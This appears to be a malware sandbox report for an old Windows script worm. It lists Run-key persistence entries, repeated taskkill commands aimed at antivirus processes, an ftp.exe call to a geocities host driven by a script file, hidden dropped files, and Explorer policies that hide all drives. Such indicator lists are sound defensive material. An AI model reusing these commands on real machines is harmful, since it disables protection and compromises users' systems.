Technical Information
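Autorun entries (values under the HKLM Run key, so the referenced scripts are started at every user logon):
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'MSN Messenger' = '<SYSTEM32>\Setup\Messenger.vbs'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'msg' = 'c:\msg.vbs'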
- Registry Editor (RegEdit)
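Command lines executed (the taskkill.exe targets throughout this list are security-product process names, e.g. mcagent.exe, navw32.exe, avpcc.exe):
- <SYSTEM32>\taskkill.exe /f /im mcagent.exe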
- <SYSTEM32>\taskkill.exe /f /im pavcl.com
- <SYSTEM32>\taskkill.exe /f /im bdnagent.exe
- <SYSTEM32>\taskkill.exe /f /im mcdetect.exe
- <SYSTEM32>\taskkill.exe /f /im PavFires.exe
- <SYSTEM32>\ftp.exe -s:c:\ftp.txt ftp.de.geocities.com
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %TEMP%\29.jpg
- <SYSTEM32>\taskkill.exe /f /im AVENGINE.exe
- <SYSTEM32>\taskkill.exe /f /im apvxdwin.exe
- <SYSTEM32>\taskkill.exe /f /im avpcc.exe
- <SYSTEM32>\taskkill.exe /f /im navw32.exe
- <SYSTEM32>\wscript.exe "C:\mail.vbs"
- <SYSTEM32>\taskkill.exe /f /im avpm.exe
- <SYSTEM32>\taskkill.exe /f /im savscan.exe
- <SYSTEM32>\taskkill.exe /f /im bdswitch.exe
- %WINDIR%\regedit.exe /s c:\kazaa.reg
- <SYSTEM32>\taskkill.exe /f /im navapw32.exe
- <SYSTEM32>\taskkill.exe /f /im navapsvc.exe
- <SYSTEM32>\attrib.exe +h +s c:\d.bat
- <SYSTEM32>\cmd.exe /c ""%TEMP%\11.bat" 0"
- <SYSTEM32>\attrib.exe +h c:\hotcakes.log
- <SYSTEM32>\ntvdm.exe -f -i2
- <SYSTEM32>\cmd.exe /c ""%TEMP%\13.bat" 0"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\9.bat" 0"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\3.bat" 0"
- <SYSTEM32>\ntvdm.exe -f -i1
- <SYSTEM32>\cmd.exe /c ""%TEMP%\7.bat" 0"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\5.bat" 0"
- <SYSTEM32>\ntvdm.exe -f
- <SYSTEM32>\wscript.exe "%TEMP%\23.vbs" 0
- <SYSTEM32>\ntvdm.exe -f -i4
- <SYSTEM32>\attrib.exe +h +s c:\b.bat
- <SYSTEM32>\attrib.exe +h +s %WINDIR%\girl99.bat
- %WINDIR%\regedit.exe /s c:\msg.reg
- <SYSTEM32>\attrib.exe +h +s c:\boy.bat
- <SYSTEM32>\attrib.exe +h +s %WINDIR%\handgun.bat
- <SYSTEM32>\ntvdm.exe -f -i3
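Process names listed separately (section label missing in this extract; all three also appear as taskkill.exe targets in the command list):
- AVPCC.EXE
- NAVAPW32.EXE
- MCAGENT.EXE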
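Explorer policy values (NoRun = 1 removes the Run command from the Start menu; NoDrives = 03FFFFFF is a bitmask with all 26 drive-letter bits set, which hides every drive in Explorer):
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'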
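File-system artefacts. The section labels were lost in this extract: three lists follow back to back. The second starts at the repeated %TEMP%\19.exe and the third at the repeated %WINDIR%\Temp\scsA.tmp. Both repeat entries of the first list, and the third adds C:\kazaa.reg and C:\ftp.txt. They presumably record different actions on the files (for example created, hidden, deleted); confirm against the original report before using them as separate indicators.
- %WINDIR%\Temp\scsA.tmp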
- %TEMP%\29.jpg
- <Current directory>\UDE
- C:\i
- C:\X.vbs
- %WINDIR%\Temp\scs9.tmp
- %TEMP%\25.scr
- <Current directory>\u
- %WINDIR%\Temp\scs7.tmp
- %TEMP%\27.exe
- %WINDIR%\Temp\scs8.tmp
- C:\h
- <SYSTEM32>\msnmsgr.vbe
- %WINDIR%\system\msnmsgr.vbe
- %ALLUSERSPROFILE%\Desktop\MSN Messenger.lnk
- %WINDIR%\msdbgsrv.dll
- <SYSTEM32>\Setup\Messenger.vbs
- %ALLUSERSPROFILE%\Desktop\Internet Explorer.lnk
- C:\k
- C:\MSOCache\C.Vitae.vbe
- C:\o
- <SYSTEM32>\IEXPLORE.vbe
- <SYSTEM32>\msn.vbe
- %TEMP%\11.bat
- %TEMP%\9.bat
- C:\hotcakes.log
- <Current directory>\m
- %TEMP%\13.bat
- %TEMP%\7.bat
- %TEMP%\3.bat
- %TEMP%\1.exe
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- %TEMP%\5.bat
- %TEMP%\15.EXE
- %WINDIR%\Temp\scs5.tmp
- %TEMP%\21.exe
- %WINDIR%\Temp\scs6.tmp
- %TEMP%\23.vbs
- <Current directory>\w
- <Current directory>\2
- %TEMP%\17.EXE
- <Current directory>\4
- %WINDIR%\Temp\scs3.tmp
- %WINDIR%\Temp\scs4.tmp
- %TEMP%\19.exe
- %TEMP%\19.exe
- %TEMP%\21.exe
- %TEMP%\15.EXE
- %TEMP%\17.EXE
- %TEMP%\27.exe
- %TEMP%\29.jpg
- %TEMP%\23.vbs
- %TEMP%\25.scr
- %TEMP%\5.bat
- %TEMP%\7.bat
- %TEMP%\1.exe
- %TEMP%\3.bat
- %TEMP%\13.bat
- C:\hotcakes.log
- %TEMP%\9.bat
- %TEMP%\11.bat
- %WINDIR%\Temp\scsA.tmp
- <Current directory>\u
- %WINDIR%\Temp\scs8.tmp
- %WINDIR%\Temp\scs9.tmp
- C:\kazaa.reg
- C:\ftp.txt
- C:\i
- C:\h
- %WINDIR%\Temp\scs3.tmp
- %WINDIR%\Temp\scs4.tmp
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- <Current directory>\w
- %WINDIR%\Temp\scs7.tmp
- %WINDIR%\Temp\scs5.tmp
- %WINDIR%\Temp\scs6.tmp
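Network activity (the remote host name is masked in these entries; the ftp.exe command line earlier in the list names ftp.de.geocities.com, which fits the mask):
- 'localhost':1037
- 'ft#.##.geocities.com':21
- DNS ASK ft#.##.geocities.com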
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-c38.c40.400007'
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-c18.c1c.3b0006'
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-b84.b88.3e0009'
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-b18.b20.370001'
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-bb8.bbc.3f000a'